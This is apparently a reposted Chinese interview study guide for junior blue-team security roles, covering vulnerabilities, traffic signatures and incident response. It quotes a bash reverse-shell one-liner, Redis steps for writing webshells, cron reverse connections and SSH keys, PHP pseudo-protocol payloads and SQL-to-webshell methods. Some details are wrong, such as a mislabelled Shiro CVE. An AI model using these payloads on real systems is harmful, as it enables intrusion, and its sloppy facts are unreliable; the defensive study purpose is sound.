面试题个人总结(面经)

news2024/12/28 18:37:03

自我介绍

你好,我叫XXX,是今天面试初级蓝队的人员,我毕业于XXXX,专业为网络空间安全,我曾经在XXXXX实习过,有过大概一年左右的工作经验,还有过一定的护网经验,去年在XXX厂商护过网,在监测岗(在流量传感器中监测告警信息和恶意流量,发攻击ip到封禁群里,通知每日的告警数量并整理),在专业上我熟悉基本的漏洞类型,如:SQL注入、XSS、CSRF、SSRF、文件上传等漏洞,熟悉sqlmap,burpsuite,wireshark、msf、cs等渗透工具使用。

1.负责特殊时期的安全保障工作

2.进行业务系统的监测防护

3.应急响应

4.定期的漏洞扫描和出具报告

蓝队要准备什么样的工作

资产的梳理:包括安全设备资产、对外服务资产、外包业务资产

风险排查:基础设施的风险排查、账号信息排查、暴露面排查

安全管理:攻防战之前的统一管控

看你平常有在挖洞,都挖的什么洞

平时在挖企业SRC漏洞和教育的SRC漏洞,挖一些逻辑漏洞(验证码爆破漏洞 、短信轰炸漏洞、权限类(水平,垂直越权)、修改订单漏洞)教育漏洞是先进行信息收集,收集他的真实ip,子域名,端口,进行cms指纹识别,通过子域名扫描出来的信息,进入了他的后台,发现是一个已经爆出漏洞的通达oa的办公系统,进行了poc的利用

这里假设有一个注入点,你打算怎么进行 sql 注入

(1)、用order by进行字段数的判断

(2)、用union联合查询判断回显点

(3)、查询数据库的相关内容、

SQL注入的类型

按照执行效果来分

布尔盲注、时间盲注、报错注入、联合查询注入

按照注入点类型分

数字型,字符型,搜索型

Linux 的重要目录

etc/passwd、etc/shadow 用户的相关信息

日志:/var/log/message系统日志

/var/log/secure 安全日志

/var/log/lastb 最后一次登陆的日志(last查看)

/var/spool/cron 有计划任务

/home/用户名/ssh 记录了公钥,看看有没有被留后门

知道反序列化吗

了解过,反序列化就是把字节序列转化为对象

java反序列化

序列化:  ObjectOutputStream类 --> writeObject()

反序列化: ObjectInputStream类 --> readObject()

php反序列化

序列化:serialize

反序列化:unserialize

常见的反序列化漏洞

Apache Shiro (Shiro-550)远程代码执行-漏洞复现

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。

服务器对cookie值base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。

特征判断:

返回包中包含rememberMe=deleteMe字段。

Apache Shiro 反序列化漏洞(Shiro-721 CVE-2016-4437)

通过Padding Oracle Attack(填充提示攻击)攻击可以实现破解AES-CBC加密过程进而实现rememberMe的内容伪造。

log4j远程代码执行漏洞

Log4j 是Apache 的一个开源项目,是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到`${`后,以:号作为分割,将表达式内容分割成两部分,前面一部分prefix,后面部分作为key,然后通过prefix去找对应的lookup,通过对应的lookup实例调用lookup方法,最后将key作为参数带入执行,引发远程代码执行漏洞。

fastjson反序列化

fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,fastjson在反序列化过程中会获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题

文件上传

在有文件上传点的地方,倘若web网站没有对文件类型进行严格的校验,导致可执行文件上传到了服务器,恶意程序就会执行。

绕过方式:

文件包含

XSS、CSRF和SSRF的区别

XSS(跨站脚本攻击)

原理:攻击者利用网站漏洞在页面中插入恶意代码,其他用户访问就会受到攻击

可以理解为攻击者窃取用户的身份信息进行操作

CSRF(跨站请求伪造)

原理:攻击者利用已经登录的用户,去诱导他访问攻击者精心构造好的页面,伪造用户的信息进行非法的请求

可以理解为攻击者没有窃取用户身份信息但是他通过其它手段获取了你的一次性身份信息的利用进行非法请求

SSRF(服务端请求伪造)

原理:由攻击者构造,服务器发起请求,利用有漏洞的服务器去攻击内网中其他服务器

可以理解为攻击者利用服务器的不严谨的过滤限制,将服务器当作跳板利用进行操作

XSS、SSRF、和重放攻击的区别

XSS是跨站脚本攻击,是由客户端发起

SSRF是服务端请求伪造,是由服务端发起

重放攻击是将截获的数据包进行重放,达到身份认证等目的

渗透测试流程

信息收集:

1、获取域名whois信息

2、服务器子域名、旁站、c段查询

3、服务器操作系统版本补丁状况、web中间件类型、版本、数据库类型等

4、服务器开放端口:22 ssh 80 web 445 3389。

漏洞扫描:

nessus,awvs ,appscan

漏洞验证:

是否存在漏洞,是否可以拿到webshell或者其他权限

权限提升:

windows内核溢出提权,数据库提权、组策略首选项提取、web中间件提权、dll劫持提权、第三方软件/服务提权

linux内核漏洞提权、sudoer配置文件错误提权、SUDO、SUID

横向渗透

日志清理

内网渗透流程

*内网信息收集

*漏洞探测

*漏洞利用

*权限提升

*权限维持

SQL注入的防范测试

(1)、分级管理,只有系统管理员才有增、删、改、查的权限

(2)、参数传值,通过设置相应的参数来传递相关的变量

(3)、基础过滤

(4)、使用安全参数

(5)、漏洞扫描

(6)、数据库信息加密

SQL注入的流量特征

在天眼的流量传感器中,监测进来的sql流量,先判断是手工注入还是工具注入,然后根据流量特征进行判断

1.参数长度异常:攻击者通常会在SQL注入攻击中使用长参数来尝试构建恶意语句,因此在网络流量中需要寻找异常长度的参数。

2.非法字符:攻击者通常使用非法字符来构建恶意SQL语句,如单引号、分号等。

3.异常请求:攻击者可能会在HTTP请求中包含多个语句或查询,或者在HTTP请求中包含错误或缺失的参数。

4.错误响应:如果应用程序未正确处理SQL注入攻击,则可能会返回错误响应。攻击者可以通过分析响应以查找此类错误,并尝试进一步攻击。

5.非常规流量:攻击者可能会在较短时间内发送大量请求,或在同一时间窗口内多次发送相同请求。这种非常规流量模式可能表明攻击正在进行中。

OWASP十大漏洞

失效的访问控制

加密机制失效

注入

不安全设计

安全配置错误

自带缺陷和过时的组件

身份识别和身份验证错误

软件和数据完整性故障

安全日志和监控故障

服务端请求伪造

常见中间件漏洞

(一) IIS

解析漏洞

(二) Apache

解析漏洞

目录遍历

(三) Nginx

文件解析

目录穿越

(四)Tomcat

1、任意文件上传

2、未授权弱口令+war后门文件部署

(五)jBoss

1、反序列化漏洞

2、war后门文件部署

(六)WebLogic

1、反序列化漏洞

攻击者利用RMI绕过weblogic黑名单限制,将加载的内容利用readObject解析,造成反序列化漏洞,该漏洞主要由于T3协议触发,所有开放weblogic控制台7001端口,默认开启T3服务,攻击者发送构造好的T3协议数据,获取目标服务器的权限。

3、任意文件上传

4、war后门文件部署

常见的框架漏洞?

log4j远程代码执行漏洞

原理: Log4j 是Apache 的一个开源项目,是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到`${`后,以:号作为分割,将表达式内容分割成两部分,前面一部分prefix,后面部分作为key,然后通过prefix去找对应的lookup,通过对应的lookup实例调用lookup方法,最后将key作为参数带入执行,引发远程代码执行漏洞。 具体操作: 在正常的log处理过程中对**${**这两个紧邻的字符做了检测,一旦匹配到类似于表达式结构的字符串就会触发替换机制,将表达式的内容替换为表达式解析后的内容,而不是表达式本身,从而导致攻击者构造符合要求的表达式供系统执行

Fastjson反序列化漏洞

判断: 正常请求是get请求并且没有请求体,可以通过构造错误的POST请求,即可查看在返回包中是否有fastjson这个字符串来判断。 原理: fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。 特征: Fastjson的消息头通常包含"Content-Type: application/json"和"User-Agent: fastjson" Fastjson消息体通常是JSON格式的字符串

Shiro反序列化漏洞

原理: Shiro是Apache下的一个开源Java安全框架,执行身份认证,授权,密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项,那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求,就不需要重新输入用户名和密码。 判断: 1.数据返回包中包含rememberMe=deleteMe字段。 2.直接发送原数据包,返回的数据中不存在关键字可以通过在发送数据包的cookie中增加字段:****rememberMe=然后查看返回数据包中是否存在关键字。 shiro-550: shiro反序列化漏洞利用有两个关键点,首先是在shiro<1.2.4时,AES加密的密钥Key被硬编码在代码里,只要能获取到这个key就可以构造恶意数据让shiro识别为正常数据。另外就是shiro在验证rememberMe时使用了readObject方法,readObject用来执行反序列化后需要执行的代码片段,从而造成恶意命令可以被执行。攻击者构造恶意代码,并且序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行编码,解密并且反序列化,最终造成反序列化漏洞。 shiro-721: 不需要key,利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的Remember。

struts2远程代码执行漏洞(s2 -062)

可以通过构造恶意的OGNL表达式发送post请求来验证漏洞

常见的Webshell连接工具流量

菜刀流量特征 (最开始是明文传输,后来采用 base64 加密)

请求包中会有eval,assert, base64的特征字符,payload为base64加密

蚁剑流量特征

1、默认的 user-agent 请求头是 antsword xxx(可修改)

2、蚁剑的正文内容用URL加密,解密后流量最中明显的特征为ini_set("display_errors","0");

.冰蝎流量特征

2.0 第一阶段请求中返回包状态码为200,响应包返回内容必定是16位的密钥

3.0 存在eval或assert等字符特征,全程无明文交互,密钥格式为连接密码md5值的前十六位字符,默认密码是rebeyond。

内置了很多ua头,看到同一个ip请求,而他们的ua头进行变化就要注意了

哥斯拉

1.jsp代码中可能会具有getclass,getclassLoader等关键字,payload使用base64编码等特征。php和asp则是普通的一句话木马。

2.在响应包的cache-control字段中有no-store,no-cache等特征。

3.所有请求中的cookie字段最后面都存在;特征。

windows、Linux应急响应

windows应急响应

(1)、检查系统账号安全

(2)、检查异常的端口和进程

(3)、检查启动项、计划任务、服务

(4)、检查系统相关信息

(5)、自动化查杀

(6)、日志分析

(7)、对系统进行防御加固

挖矿应急响应

1、先用ps和top查看进程和cpu占用率。用pwdx根据pid查看文件在哪。

2、把挖矿病毒文件删了,然后taskkill -9 pid干掉程序。

3、在排查计划任务 看/etc/crontab 还有/var/spool/ 的cron里面 在等几分钟,如果挖矿木马没有重新出现在进程里 如果重新出现,说明失败。

4、再通过systemctl status pid排查他的守护进程,并进行逐一清除。

挖矿的流量特征

可以通过观察请求包和响应包的数据流量,可以发现一些异常的ip地址,把他放到在线威胁情报中心,可以识别出这个ip是恶意的代理ip还是矿池的ip,还有就是他会有一些特征的字符串,比如miner(矿石)

上传webshell应急响应

1、将服务进行下线隔离

2、确定入侵时间

3、对web日志进行分析

4、清除webshell文件、修复漏洞

5、用D盾和webshell河马查杀

反弹Shell应急响应

明确反弹shell写法: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

1、登录服务器查看命令:ps -ef,过滤出反弹shell的进程

2、定位进程启动路径,命令:pwdx pid

3、进入启动路径,确认启动的服务是否正常,命令:cd *

4、定位可疑文件,并删除。命令:rm

5、停止进程shell进程,命令:kill -9 pid

内存马的应急响应

内存马是恶意程序把自己注入到进程的内存中,而且他不占用磁盘空间,所以很难被杀毒软件监测和拦截

我们可以通过对进程进行分析(进程名称、PID、所属用户、内存占用)

对系统日志进行分析(系统启动、服务开启、网络连接)

使用内存分析工具

使用网络监测工具

使用过的安全设备

IDS(入侵检测系统):天融信的入侵检测系统、腾讯云

IPS(入侵防御系统)方面:安全洋葱(security Onion)

安全感知系统:奇安信天眼

WAF(Web应用防火墙 ):安全狗以及宝塔

威胁情报方面:360威胁情报中心、微步在线情报中心

漏洞扫描方面:nessus、AWVS、appscan、goby

沙箱:可以让我们把一些不确定是否是病毒,恶意文件,可以上传到沙箱里,分析其实不是恶意文件。

蜜罐方面:微步的Hfish

登陆注册框页面可以测试哪些漏洞

1、弱口令

2、sql注入

3、暴力破解

4、验证码绕过

5、目录扫描工具

6、js敏感信息泄露

SQL注入怎么写入webshell?

1、知道web绝对路径

2、有文件写入权限(一般情况只有ROOT用户有)

3、数据库开启了secure_file_priv设置

然后就能用select into outfile/into dumpfile写入webshell

浏览器的同源策略

同源策略是浏览器最核心也是最基本的安全功能, 如果两个URL的协议、域名、端口号都相同,就称这两个URL同源。

跨域资源共享(CORS)

jsonp跨域

绕过方法

常规绕过:小写、双写、编码、注释、垃圾字符、分块传输、HPP、WAF 特性等

白名单绕过:MIME类型、%00截断、0x00截断、0x0a截断

黑名单绕过:大小写、空格、点号绕过、双写绕过

PHP常用的伪协议

1、php://input

可以用于执行php代码,通过post请求提交我们的代码

2、php://filter

用于读取源码,通过get请求提交参数。它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。

常用形式:

?a=php://filter/read=convert.base64/resource=xxx.php

3、zip、phar伪协议

用于读取压缩包中的文件

4、file:// 文件协议

常用格式:

file://[本地文件系统的绝对路径]

例如:?file=file://D:/Server/htdocs/emlog/phpinfo.txt

5、data协议

常用格式:

data://text/plain,xxxx(要执行的php代码)

data://text/plain;base64,xxxx(base64编码后的数据)

例如:

?page=data://text/plain,

权限提升

windows内核溢出提权,数据库提权、组策略首选项提取、web中间件提权、dll劫持提权、第三方软件/服务提权

linux内核漏洞提权、sudoer配置文件错误提权、SUID、SUDO

在天眼的流量传感器中遇到了一个告警,他没有源ip(攻击ip)是为什么?

可能是弹出恶意广告,他是一个告警,无法找到攻击ip,而天眼获取的ip都是从数据包里面找的,没有数据包,也就没有攻击ip这个字段

天眼的工作原理?

将各个部署的流量传感器中的流量收集起来,统一进行查看分析

天眼构成:

①流量传感器(探针)②文件威胁鉴定器(沙箱)③分析平台 ④天擎(若有)

看天眼的时候,同一个告警,同一时间出现了两遍怎么回事

同一个数据包中匹配到了多条天眼的规则,所以出现多个告警

怎么确定web攻击是误报

web攻击误报,需要查看数据包的内容,从内容判断,是否含有攻击代码,恶意语句等

哪些是内网,那些是外网,怎么判断?

判断内外网可以从ip来判断,例如:内网ip都是10.10.开头的

IPS和IDS的区别

A、IPS对于初始者来说,是位于防火墙和网络的设备之间的设备。这样,如果检测到攻击,IPS会在这种攻击扩散到网络的其它地方之前阻止这个恶意的通信。而IDS只是存在于你的网络之外起到报警的作用,而不是在你的网络前面起到防御的作用。

B、IPS具有检测已知和未知攻击并具有成功防止攻击的能力而IDS没有

C、IDS的局限性是不能反击网络攻击,因为IDS传感器基于数据包嗅探技术,只能眼睁睁地看着网络信息流过。IPS可执行IDS相同的分析,因为他们可以插入网内,装在网络组件之间,而且他们可以阻止恶意活动

SQL延时注入sleep函数被禁用怎么办

可以用下面的函数代替

benchmark():BENCHMARK(count,expr):BENCHMARK会重复计算expr表达式count次

pg_sleep():pg_sleep(seconds):pg_sleep让当前的会话进程休眠 seconds 秒以后再执行

sql宽字节追原理

mysql在使用GBK编码(GBK是宽字节,双字节)的时候,会认为两个字符是一个汉字,我们输入的字符和转义的反斜杠组成了新的汉字,但是组成的新汉字又不是一个正常的汉字,就起到了注掉 \ 的作用

正向代理与反向代理的区别

正向代理是代理客户端,反向代理是代理服务器。

而根据这核心的区别,我们也可以记住:代理哪端便可以隐藏哪端。

也就是说:

正向代理隐藏真实客户端,反向代理隐藏真实服务端。

在监测的时候漏掉一条流量,客户问你的时候怎么回答?

筛查其他流量的时候,没看到这一条,不过后续他有任何其他操作,我们设备这边相互配合都可以看到的

一个ip被封,但是又出现了

可能是出口防火墙封禁的内网的ip,但是此时是内网的两台机器在内网中通信,出口防火墙管不了

Redis漏洞

1、写入webshell,用:config set dir /var/www/html/ 动态修改写入的路径到网站根目录下,再动态修改写入文件的文件名:config set dbfilename zcc.php,用webshell管理工具连接

2、在定时任务里面写入反弹连接

config set dir /var/spool/cron/ config set dbfilename root

3、导入密钥,免密登录

现在攻击机上生成密钥

ssh-keygen -t rsa

将生成的公钥写入靶机服务器的内存之中

cat key.txt | redis-cli -h 192.168.190.128 -x set xxx // -x 代表从标准输入读取数据作为该命令的最后一个参数。

config set dir /root/.ssh config set dbfilename authorized_keys save

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1498331.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

大型网站架构演化总结

本文图解大型网站架构演化。 目录 1、单一应用服务阶段 2、应用与数据服务分离阶段 3、利用缓存提高性能阶段 4、应用服务集群阶段 5、数据库读写分离阶段 6、反向代理与CDN加速阶段 7、分布式数据库阶段 8、 NoSQL与搜索引擎阶段 9、业务拆分阶段 10、分布式服务阶…

电脑要用多少V的电源?电脑电源输入电压是市电

台式电源的输出电压是多少&#xff1f; 电脑电源输出一般有三种不同的电压&#xff0c;分别是&#xff1a; 12V、5V、3.3V。 电脑电源负责给电脑配件供电&#xff0c;如CPU、主板、内存条、硬盘、显卡等&#xff0c;是电脑的重要组成部分。 工作电流根据不同的硬件及其使用状…

从仓储管理看3C电子行业智慧物流的优势

仓储管理是智慧物流的重要组成部分。通过引入自动化、智能化的仓储管理系统&#xff0c;3C电子企业可以实现库存的精准管理、快速分拣和高效配送。这不仅减少了库存成本&#xff0c;还大大提高了运营效率和市场响应速度。 传统的仓储管理依赖于人工操作和纸质文档记录&#xff…

Java项目:37 springboot003图书个性化推荐系统的设计与实现

作者主页&#xff1a;舒克日记 简介&#xff1a;Java领域优质创作者、Java项目、学习资料、技术互助 文中获取源码 项目介绍 springboot003图书个性化推荐系统的设计与实现 管理员&#xff1a;首页、个人中心、学生管理、图书分类管理、图书信息管理、图书预约管理、退换图书…

unity学习(50)——服务器三次注册限制以及数据库化角色信息5--角色信息数据库化收尾

上一节内容结束后确实可以写入文件了&#xff0c;但还有两个问题&#xff1a; 1.一个是players.txt中&#xff0c;每次重启服务器&#xff0c;当注册新账号创建角色时&#xff0c;players.txt之前内容都会清空。 2.players.txt之前已经注册3次的账号&#xff0c;新注册的角色…

做接口测试的流程一般是怎么样的?2024全网最全教程(建议收藏)

在讲接口流程测试之前&#xff0c;首先需要给大家申明下&#xff1a;接口测试对于测试人员而言&#xff0c;非常非常重要&#xff0c;懂功能测试接口测试&#xff0c;就能在企业中拿到一份非常不错的薪资。不信请狠狠点击下方链接&#xff08;下方链接也有接口学习方法及学习资…

Vue中的v-for中为什么不推荐使用index作为key值

在Vue中&#xff0c;我们经常会用到v-for指令来遍历数组或对象并渲染列表。而在使用v-for指令时&#xff0c;通常会需要给每个遍历的元素指定一个唯一的key值&#xff0c;以帮助Vue更高效地更新DOM。 在很多情况下&#xff0c;我们可能会倾向于使用index作为key值&#xff0c;…

Qt程序设计-柱状温度计自定义控件实例

Qt程序设计-柱状温度计自定义控件实例 本文讲解Qt柱状温度计自定义控件实例。 效果演示 创建温度计类 #ifndef THERMOMETER_H #define THERMOMETER_H#include <QWidget> #include <QPainter> #include <QDebug> #include <QTimer> #include <QPr…

Unity之街机捕鱼

目录 &#x1f62a;炮台系统 &#x1f3b6;炮口方向跟随鼠标 &#x1f3b6;切换炮台 &#x1f62a;战斗系统 &#x1f3ae;概述 &#x1f3ae;单例模式 &#x1f3ae;开炮 &#x1f3ae;子弹脚本 &#x1f3ae;渔网脚本 &#x1f3ae;鱼属性信息的脚本 &#x1f6…

HTML5:七天学会基础动画网页9

在进行接下来的了解之前我们先来看一下3d的xyz轴&#xff0c;下面图中中间的平面就相当于电脑屏幕&#xff0c;z轴上是一个近大远小的效果。 3d转换属性 transform 2D或3D转换 transform-origin 改变旋转点位置 transform-style 嵌套元素在3D空间如何显 …

文件二维码怎么加访问权限?加密、限时、限次的二维码制作技巧

扫码查看或者下载文件已经是现在经常被使用的一种方式&#xff0c;当我们通过这种方式来展现文件内容时&#xff0c;是否能够加入一些权限设置来保障文件的安全性&#xff0c;是很多小伙伴非常关心的一个问题。 想要制作文件二维码&#xff0c;大多情况下会通过在线二维码生成…

GPQA数据集分享

来源: AINLPer公众号&#xff08;每日干货分享&#xff01;&#xff01;&#xff09; 编辑: ShuYini 校稿: ShuYini 时间: 2024-2-28 尽管AI系统在许多任务上表现出色&#xff0c;但在需要大量专业知识和推理能力的任务上仍然存在局限性。为此&#xff0c;纽约大学的研究者提出…

Yii2中如何使用scenario场景,使rules按不同运用进行字段验证

Yii2中如何使用scenario场景&#xff0c;使rules按不同运用进行字段验证 当创建news新闻form表单时&#xff1a; 添加新闻的时候执行create动作。 必填字段&#xff1a;title-标题&#xff0c;picture-图片&#xff0c;description-描述。 这时候在model里News.php下rules规则…

智慧城市中的数据力量:大数据与AI的应用

目录 一、引言 二、大数据与AI技术的融合 三、大数据与AI在智慧城市中的应用 1、智慧交通 2、智慧环保 3、智慧公共安全 4、智慧公共服务 四、大数据与AI在智慧城市中的价值 1、提高城市管理的效率和水平 2、优化城市资源的配置和利用 3、提升市民的生活质量和幸福感…

【人工智能课程】计算机科学博士作业三

【人工智能课程】计算机科学博士作业三 来源&#xff1a;李宏毅2022课程第10课的作业 1 图片攻击概念 图片攻击是指故意对数字图像进行修改&#xff0c;以使机器学习模型产生错误的输出或者产生预期之外的结果。这种攻击是通过将微小的、通常对人类难以察觉的扰动应用于输入…

1.5 简述转置卷积的主要思想以及应用场景

1.5 简述转置卷积的主要思想以及应用场景 普通的卷积主要思想&#xff1a; 普通的卷积操作可以形式化为一个矩阵乘法运算&#xff0c;即yAx&#xff08;1-12&#xff09; 其中&#xff0c;x和y分别是卷积的输入和输出(展平成一维向量形式)&#xff0c;维度分别为d⁽i⁾和d⁽…

计算机设计大赛 深度学习花卉识别 - python 机器视觉 opencv

文章目录 0 前言1 项目背景2 花卉识别的基本原理3 算法实现3.1 预处理3.2 特征提取和选择3.3 分类器设计和决策3.4 卷积神经网络基本原理 4 算法实现4.1 花卉图像数据4.2 模块组成 5 项目执行结果6 最后 0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 &a…

[网络安全] PKI

一、PKI 概述 名称; 公钥基础设施 (Public Key Facility) 作用: 通过加密技术和数字签名保证信息安全 组成: 公钥机密技术、数字证书、CA、RA 二、信息安全三要素 机密性&#xff1a;确保仅信息发收双方 能看懂信息 完整性&#xff1a; 确保信息发收完整&#xff0c;不被破坏 …

阿珊带你深入理解 async/await 函数

&#x1f90d; 前端开发工程师、技术日更博主、已过CET6 &#x1f368; 阿珊和她的猫_CSDN博客专家、23年度博客之星前端领域TOP1 &#x1f560; 牛客高级专题作者、打造专栏《前端面试必备》 、《2024面试高频手撕题》 &#x1f35a; 蓝桥云课签约作者、上架课程《Vue.js 和 E…

【RabbitMQ】WorkQueue

&#x1f4dd;个人主页&#xff1a;五敷有你 &#x1f525;系列专栏&#xff1a;MQ ⛺️稳中求进&#xff0c;晒太阳 Work Queues Work queues任务模型&#xff0c;简单来说就是让多个消费者绑定到一个队列&#xff0c;共同消费队列中的消息 当消息处理比较耗时的时候&…